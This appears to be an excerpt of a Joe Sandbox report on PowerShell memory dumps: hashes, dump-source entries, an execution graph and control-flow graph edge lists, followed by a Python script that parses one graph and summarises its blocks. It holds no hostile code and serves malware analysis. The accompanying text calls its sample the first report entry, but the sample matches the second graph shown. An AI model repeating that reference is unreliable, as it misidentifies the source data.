• Snapshot File: hcaresult_2_2_7ffd9b790000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 810dad76196eac24caf3a208531c8d3891822cdb49258b212233642e21d9b3b3
• Instruction ID: aea5fd7699655cec9842f30cd2c434872f1a069db8d5e3624828f16498ca8b32
• Opcode Fuzzy Hash: 810dad76196eac24caf3a208531c8d3891822cdb49258b212233642e21d9b3b3
• Instruction Fuzzy Hash: A842E330A0DB8D4FDBB8DF188869BB577E0FF55300F054279D84EC72A2DA34AA558781

Memory Dump Source
• Source File: 00000002.00000002.1854735452.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd9b790000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4a51c099ba7ed9a070f84394b766354e54c7448ae7a34758cdece5fa9c8b3089
• Instruction ID: b6504fbadafd160cf8c4d38bae305c8203f606240dbb9d3dfdbcf16c2f012a1d
• Opcode Fuzzy Hash: 4a51c099ba7ed9a070f84394b766354e54c7448ae7a34758cdece5fa9c8b3089
• Instruction Fuzzy Hash: 97129130A19B4D4FEFB8DF588869BB577E0FF58300F054279D84EC72A2DA34AA558781

Memory Dump Source
• Source File: 00000002.00000002.1854735452.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd9b790000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cb232f16372ce4dc76ce2e1bacb9b1dba2503c2453714d32efc1b3b1b5e5e874
• Instruction ID: 6a843d92a16618f5f6402ab1cb5dbdede82e58f4892871af6b787616b5c859ce
• Opcode Fuzzy Hash: cb232f16372ce4dc76ce2e1bacb9b1dba2503c2453714d32efc1b3b1b5e5e874
• Instruction Fuzzy Hash: 64F12621B1D74E4FF7A89B68806127A77C1EF86314F56067DE49EC36F2DE2CA9028341

Memory Dump Source
• Source File: 00000002.00000002.1854735452.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd9b790000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b676f09f95fb047fd6bc3eee1b1b0440b469936a2d3c055ef89378d56d0633c3
• Instruction ID: 5c3d4041362edc016674ecf562c1e6126fa53f0e9e3e12073728f6d85c9283fa
• Opcode Fuzzy Hash: b676f09f95fb047fd6bc3eee1b1b0440b469936a2d3c055ef89378d56d0633c3
• Instruction Fuzzy Hash: 53517157B0F7D24FE326A6F8987A0E93FA0DF5366470A02F7C4D54A0B3DA1A2906C751

Memory Dump Source
• Source File: 00000002.00000002.1854735452.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd9b790000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a3414e13ea297a8a87c91830cc428d8fb72e9290349d39bc5045a736f449441b
• Instruction ID: eb2a280cbf361d87ccba4367c0a6873e007879adf3b6e5ab2c66549292619f20
• Opcode Fuzzy Hash: a3414e13ea297a8a87c91830cc428d8fb72e9290349d39bc5045a736f449441b
• Instruction Fuzzy Hash: FA318E2F74C5224EE309B6BEB5554FC6341DFC533470886B7D28A8D0878E0858CB8AD5

Execution Graph

Execution Coverage: 2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 3
Total number of Limit Nodes: 0
execution_graph 8611 7ffd9b77c4a4 8612 7ffd9b77c4ad LoadLibraryExW 8611->8612 8614 7ffd9b77c55d 8612->8614

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000003.00000002.1973734072.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffd9b770000_powershell.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 2b08cd8cb3e894a00bdd1c37fc89668b8fcbc7bd2c2b5b51ec2124f3327a1f00
• Instruction ID: 34bf17855d709aed39cebc44ca5d84144b42bc8368f7ecc22486d0995f880efb
• Opcode Fuzzy Hash: 2b08cd8cb3e894a00bdd1c37fc89668b8fcbc7bd2c2b5b51ec2124f3327a1f00
• Instruction Fuzzy Hash: 5531C43190CB5C8FDB19DBA88849BE9BBE0FF55321F04426BD059D3251DB74A415CB91

Control-flow Graph

control_flow_graph 9 7ffd9b847255-7ffd9b84725f 10 7ffd9b847261 9->10 11 7ffd9b847268-7ffd9b847277 9->11 10->11 12 7ffd9b847280-7ffd9b84728f 11->12 13 7ffd9b847279 11->13 14 7ffd9b847291 12->14 15 7ffd9b847298-7ffd9b8472a7 12->15 13->12 14->15 16 7ffd9b8472b0-7ffd9b8472bf 15->16 17 7ffd9b8472a9 15->17 18 7ffd9b8472c1 16->18 19 7ffd9b8472c8-7ffd9b8472f8 16->19 17->16 18->19 21 7ffd9b84736b-7ffd9b847374 19->21 22 7ffd9b8472fa-7ffd9b84736a 19->22 23 7ffd9b8475ec-7ffd9b8476ab 21->23 24 7ffd9b84737a-7ffd9b847384 21->24 22->21 26 7ffd9b84739d-7ffd9b8473a2 24->26 27 7ffd9b847386-7ffd9b847393 24->27 31 7ffd9b847590-7ffd9b84759a 26->31 32 7ffd9b8473a8-7ffd9b8473ab 26->32 27->26 34 7ffd9b847395-7ffd9b84739b 27->34 35 7ffd9b84759c-7ffd9b8475a8 31->35 36 7ffd9b8475a9-7ffd9b8475e9 31->36 37 7ffd9b8473ad-7ffd9b8473c0 32->37 38 7ffd9b8473c2 32->38 34->26 36->23 43 7ffd9b8473c4-7ffd9b8473c6 37->43 38->43 43->31 46 7ffd9b8473ca-7ffd9b847403 43->46 62 7ffd9b847427 46->62 63 7ffd9b847405-7ffd9b847418 46->63 65 7ffd9b847429-7ffd9b84742b 62->65 63->46 73 7ffd9b84741a-7ffd9b847425 63->73 65->31 67 7ffd9b847431-7ffd9b847439 65->67 67->23 70 7ffd9b84743f-7ffd9b847449 67->70 71 7ffd9b847465-7ffd9b847475 70->71 72 7ffd9b84744b-7ffd9b847463 70->72 71->31 77 7ffd9b84747b-7ffd9b8474ac 71->77 72->71 73->65 77->31 83 7ffd9b8474b2-7ffd9b8474de 77->83 88 7ffd9b8474e0-7ffd9b847507 83->88 89 7ffd9b847509 83->89 90 7ffd9b84750b-7ffd9b84750d 88->90 89->90 90->31 92 7ffd9b847513-7ffd9b84751b 90->92 93 7ffd9b84751d-7ffd9b847527 92->93 94 7ffd9b84752b 92->94 95 7ffd9b847547-7ffd9b847576 93->95 96 7ffd9b847529 93->96 98 7ffd9b847530-7ffd9b847545 94->98 101 7ffd9b84757d-7ffd9b84758f 95->101 96->98 98->95
Memory Dump Source
• Source File: 00000003.00000002.1974680922.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffd9b840000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 391f95a872a41f425673f1a779ebd31bdcafc100ebb612d3150636f6b1ca3832
• Instruction ID: ebc91550e56d63e6521c37f98571ca25f37d1494f370d790f3bb2cd470677ed2
• Opcode Fuzzy Hash: 391f95a872a41f425673f1a779ebd31bdcafc100ebb612d3150636f6b1ca3832
• Instruction Fuzzy Hash: 68F13576A0F7CA0FE766976848755B97FA3EF5A314F0A00FAD489CB0E3D918A904C351

Control-flow Graph

control_flow_graph 194 7ffd9b8476ad-7ffd9b8476b9 195 7ffd9b8476bc-7ffd9b8476cd 194->195 196 7ffd9b8476bb 194->196 197 7ffd9b8476d0-7ffd9b8476e1 195->197 198 7ffd9b8476cf 195->198 196->195 199 7ffd9b8476e4-7ffd9b8476f5 197->199 200 7ffd9b8476e3 197->200 198->197 201 7ffd9b8476f8-7ffd9b847709 199->201 202 7ffd9b8476f7 199->202 200->199 203 7ffd9b84770c-7ffd9b8477af 201->203 204 7ffd9b84770b 201->204 202->201 213 7ffd9b847970-7ffd9b847a25 203->213 214 7ffd9b8477b5-7ffd9b8477bf 203->214 204->203 215 7ffd9b8477c1-7ffd9b8477d6 214->215 216 7ffd9b8477d8-7ffd9b8477dc 214->216 215->216 219 7ffd9b8477e2-7ffd9b8477e5 216->219 220 7ffd9b847918-7ffd9b847922 216->220 221 7ffd9b8477e7-7ffd9b8477f0 219->221 222 7ffd9b8477fc-7ffd9b847800 219->222 223 7ffd9b84792f-7ffd9b84796d 220->223 224 7ffd9b847924-7ffd9b84792e 220->224 221->222 222->220 229 7ffd9b847806-7ffd9b84783d 222->229 223->213 242 7ffd9b84783f-7ffd9b84785f 229->242 243 7ffd9b847861 229->243 245 7ffd9b847863-7ffd9b847865 242->245 243->245 245->220 247 7ffd9b84786b-7ffd9b8478a5 245->247 255 7ffd9b8478be-7ffd9b8478ee 247->255 256 7ffd9b8478a7-7ffd9b8478b4 247->256 264 7ffd9b8478f0-7ffd9b8478fc 255->264 256->255 259 7ffd9b8478b6-7ffd9b8478bc 256->259 259->255 265 7ffd9b847903-7ffd9b847917 264->265
Memory Dump Source
• Source File: 00000003.00000002.1974680922.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffd9b840000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8dc6432f2289e6d1e4a48370c97cd1c7dd8caadb9639ab26abed912bfab07302
• Instruction ID: 3f320a0d1ea262d7575c24b02161745a21e4df019d4cc026c033da0a6442c49e
• Opcode Fuzzy Hash: 8dc6432f2289e6d1e4a48370c97cd1c7dd8caadb9639ab26abed912bfab07302
• Instruction Fuzzy Hash: 14C12666A0F6CD5FEBA297B848745A53FA2EF5E214F0900FFD098C70E3EA185905C351

                                                                                                                              Control-flow Graph

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000003.00000002.1974680922.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd9b840000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d747c4024410e6378e66d89bfa3661214e4122d48d2501f945339aadf12276ea
                                                                                                                              • Instruction ID: 132077b436eba43b6a8a0311e9fa7b540ba3de1d4d47cbb31b34049b973fb1bf
                                                                                                                              • Opcode Fuzzy Hash: d747c4024410e6378e66d89bfa3661214e4122d48d2501f945339aadf12276ea
                                                                                                                              • Instruction Fuzzy Hash: EA512432B0FA8A0FEBA59BA818716B476D2EF5D214B5E04BED04DC71E3DE18A8058341

                                                                                                                              Control-flow Graph

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000003.00000002.1974680922.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd9b840000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5a9ebf7d9a04f6a1ca21f57f2e5203ef94b4552476081b8366c6fe93a4b55150
                                                                                                                              • Instruction ID: 7bfcb41afb3719659e79910557433693e69bf50c11fb935c953838d5dd594e30
                                                                                                                              • Opcode Fuzzy Hash: 5a9ebf7d9a04f6a1ca21f57f2e5203ef94b4552476081b8366c6fe93a4b55150
                                                                                                                              • Instruction Fuzzy Hash: 5441C376E0FACA1FFBB697A818751B86A93EF5D254B5A00BAD059C71E3DD0C59008301

                                                                                                                              Control-flow Graph

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000003.00000002.1974680922.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd9b840000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2189c7e0f813e283174a100f1259af1656b66bb10996d0190cadc0996d09f355
                                                                                                                              • Instruction ID: 2bb21e394ff51c1e0ec12dc7274f59e0a0b7bd54b06cd2cc8b070f55ee3db9f6
                                                                                                                              • Opcode Fuzzy Hash: 2189c7e0f813e283174a100f1259af1656b66bb10996d0190cadc0996d09f355
                                                                                                                              • Instruction Fuzzy Hash: 8C31F667B0FACA0BF7B19BA818712B466C6EF5D254B5E04BED05DC30E3ED1899058201
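The control_flow_graph edge list in the first entry above is plain text, so it can be parsed and queried without the sandbox UI. The following is an added example, not code from the Joe Sandbox report or its IDA plugin: it parses the "<block id> <start>[-<end>]" and "<a>-><b>" tokens into an adjacency map and then answers the questions an analyst asks first of a dumped function, namely where it enters, which blocks have no listed successor (a return or tail jump, or possibly an edge the export did not record), which blocks every path to an exit must pass through, and which blocks collapse to a single listed address (one-instruction blocks that deserve a look in the disassembly). The sample input is the edge list of the first entry, copied verbatim; all function names are my own.

```python
"""Parse a Joe Sandbox "control_flow_graph" edge list and summarise the function it describes.

Added example, not code from the Joe Sandbox report. Input format as printed in the report:
"<block id> <start>[-<end>]" declares a basic block (hex addresses), "<a>-><b>" declares an edge.
"""
import re
from collections import defaultdict

# Sample input: the control_flow_graph line of the first report entry above, copied verbatim.
SAMPLE_CFG = """control_flow_graph 194 7ffd9b8476ad-7ffd9b8476b9 195 7ffd9b8476bc-7ffd9b8476cd
194->195 196 7ffd9b8476bb 194->196 197 7ffd9b8476d0-7ffd9b8476e1 195->197 198 7ffd9b8476cf 195->198
196->195 199 7ffd9b8476e4-7ffd9b8476f5 197->199 200 7ffd9b8476e3 197->200 198->197
201 7ffd9b8476f8-7ffd9b847709 199->201 202 7ffd9b8476f7 199->202 200->199 203 7ffd9b84770c-7ffd9b8477af
201->203 204 7ffd9b84770b 201->204 202->201 213 7ffd9b847970-7ffd9b847a25 203->213
214 7ffd9b8477b5-7ffd9b8477bf 203->214 204->203 215 7ffd9b8477c1-7ffd9b8477d6 214->215
216 7ffd9b8477d8-7ffd9b8477dc 214->216 215->216 219 7ffd9b8477e2-7ffd9b8477e5 216->219
220 7ffd9b847918-7ffd9b847922 216->220 221 7ffd9b8477e7-7ffd9b8477f0 219->221 222 7ffd9b8477fc-7ffd9b847800
219->222 223 7ffd9b84792f-7ffd9b84796d 220->223 224 7ffd9b847924-7ffd9b84792e 220->224 221->222 222->220
229 7ffd9b847806-7ffd9b84783d 222->229 223->213 242 7ffd9b84783f-7ffd9b84785f 229->242 243 7ffd9b847861
229->243 245 7ffd9b847863-7ffd9b847865 242->245 243->245 245->220 247 7ffd9b84786b-7ffd9b8478a5 245->247
255 7ffd9b8478be-7ffd9b8478ee 247->255 256 7ffd9b8478a7-7ffd9b8478b4 247->256 264 7ffd9b8478f0-7ffd9b8478fc
255->264 256->255 259 7ffd9b8478b6-7ffd9b8478bc 256->259 259->255 265 7ffd9b847903-7ffd9b847917 264->265"""

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")


def parse_cfg(text):
    """Return (blocks, succ): blocks maps id -> (start, end) ints, succ maps id -> [successor ids]."""
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, succ, i = {}, defaultdict(list), 0
    while i < len(tokens):
        m = EDGE_RE.match(tokens[i])
        if m:  # edge token "<a>-><b>"
            succ[int(m.group(1))].append(int(m.group(2)))
            i += 1
            continue
        # Block declaration "<id> <start>[-<end>]"; a lone address means a single listed address.
        block_id = int(tokens[i])
        lo, _, hi = tokens[i + 1].partition("-")
        start = int(lo, 16)
        blocks[block_id] = (start, int(hi, 16) if hi else start)
        i += 2
    # Refuse edges that name a block never declared, rather than silently dropping them.
    for src, dsts in succ.items():
        for b in (src, *dsts):
            if b not in blocks:
                raise ValueError(f"edge references undeclared block {b}")
    return blocks, {b: succ.get(b, []) for b in blocks}


def entry_blocks(blocks, succ):
    """Blocks with no predecessor: the function entry (ideally exactly one)."""
    targets = {d for ds in succ.values() for d in ds}
    return sorted(b for b in blocks if b not in targets)


def exit_blocks(blocks, succ):
    """Blocks with no listed successor: return/tail jump, or an edge the export did not record."""
    return sorted(b for b in blocks if not succ[b])


def single_address_blocks(blocks):
    """Blocks whose range collapses to one address: one-instruction blocks worth a manual look."""
    return sorted(b for b, (s, e) in blocks.items() if s == e)


def reachable(succ, start, avoid=frozenset()):
    """Depth-first reachability from `start`, never entering blocks in `avoid`."""
    seen, stack = set(), [start]
    while stack:
        b = stack.pop()
        if b in seen or b in avoid:
            continue
        seen.add(b)
        stack.extend(succ[b])
    return seen


def unavoidable_blocks(blocks, succ, entry):
    """Blocks every path from `entry` to some exit must pass through (entry included)."""
    exits = set(exit_blocks(blocks, succ))
    out = [entry]
    for b in blocks:
        if b != entry and not exits & reachable(succ, entry, avoid={b}):
            out.append(b)
    return sorted(out)


def summarize(text):
    """One-shot summary dict for a control_flow_graph line."""
    blocks, succ = parse_cfg(text)
    entry = entry_blocks(blocks, succ)
    single_entry = entry[0] if len(entry) == 1 else None
    return {
        "blocks": len(blocks),
        "edges": sum(len(v) for v in succ.values()),
        "entry": entry,
        "exits": exit_blocks(blocks, succ),
        "single_address": single_address_blocks(blocks),
        "unreachable": sorted(set(blocks) - reachable(succ, single_entry)) if single_entry else None,
        "unavoidable": unavoidable_blocks(blocks, succ, single_entry) if single_entry else None,
        "span": (hex(min(s for s, _ in blocks.values())), hex(max(e for _, e in blocks.values()))),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_CFG).items():
        print(f"{key}: {value}")
```

On the sample, the function has one entry (block 194), three blocks with no listed successor (213, 224, 265), six single-address blocks (196, 198, 200, 202, 204, 243), and a chain of blocks 194, 195, 197, 199, 201, 203 that every path to an exit passes through; block 224 ends one address short of block 223 yet has no edge to it, which is the kind of gap to check against the actual disassembly before trusting the graph.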